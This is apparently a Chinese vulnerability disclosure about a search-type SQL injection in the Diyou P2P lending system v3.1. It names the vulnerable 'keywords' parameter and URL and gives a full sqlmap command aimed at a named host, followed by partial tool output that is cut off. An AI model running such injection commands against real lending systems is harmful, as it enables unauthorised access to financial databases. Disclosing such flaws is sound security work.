帝友P2P借贷系统搜索型SQL注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: 标题上面说是v3.1版本,具体是什么版本,亲~您懂的。 ``` http://v31.diyou.cc/transfer_success/index.html?keywords=1&borrow_type=&account_status=&borrow_interestrate=&spread_month= ``` 注入点keywords 直接带入数据库中查询/ ``` C:\Python27\sqlmap>sqlmap.py -u "http://v31.diyou.cc/transfer_success/index.html ?keywords=1&borrow_type=&account_status=&borrow_interestrate=&spread_month=" --b atch -p "keywords" -v 2 --current-db sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 12:03:53 [12:03:53] [DEBUG] cleaning up configuration parameters [12:03:53] [DEBUG] setting the HTTP timeout [12:03:53] [DEBUG] setting the HTTP method to GET [12:03:53] [DEBUG] creating HTTP requests opener object [12:03:53] [INFO] using 'C:\Python27\sqlmap\output\v31.diyou.cc\session' as sess ion file [12:03:53] [INFO] resuming injection data from session file [12:03:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [12:03:53] [INFO] testing connection to...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息